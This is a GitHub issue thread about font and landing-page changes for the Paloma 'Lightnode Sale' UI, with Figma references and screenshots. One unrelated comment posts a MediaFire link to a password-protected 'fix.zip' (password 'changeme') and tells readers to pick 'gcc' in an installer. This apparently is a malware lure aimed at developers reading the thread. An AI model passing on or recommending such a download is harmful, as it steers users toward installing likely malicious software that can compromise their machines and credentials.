### ISSUE TITLE
[LIGHTNODE SALE]  UI Changes

### ISSUE THREAD

**Issue by verabehr** [VolumeFi/paloma#2063]
- [x] Font. "Copy and Paste the command" changes to Inter.

![Image](https://github.com/user-attachments/assets/40a3054f-0f1d-45db-99b3-b14c31007c09)

- [x] Landing Page. Titles should be in font "RockStar" Black
** Please check the Figma to match fonts: https://www.figma.com/design/yC7zuL9bFx9yvPd2aBalX6/Paloma-Light-Sale-Node?node-id=1-4784&t=PQ8eT4zm3oUuLOVt-4

Font: 
[RockStar Black.zip](https://github.com/user-attachments/files/16762790/RockStar.Black.zip)

<img width="533" alt="Captura de pantalla 2024-08-27 a las 15 21 33" src="https://github.com/user-attachments/assets/5d52a107-6115-4a72-b356-cdf495e15fca">

<img width="578" alt="Captura de pantalla 2024-08-27 a las 15 22 31" src="https://github.com/user-attachments/assets/b20a69bb-fb57-4bac-b8ff-1277ba8ab249">

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jamie088** [comment]
@verabehr @joycehermosilla Please clarify what needs to be changed here.

**Comment by verabehr** [comment]
@jamie088 - @joycehermosilla updated this with the details
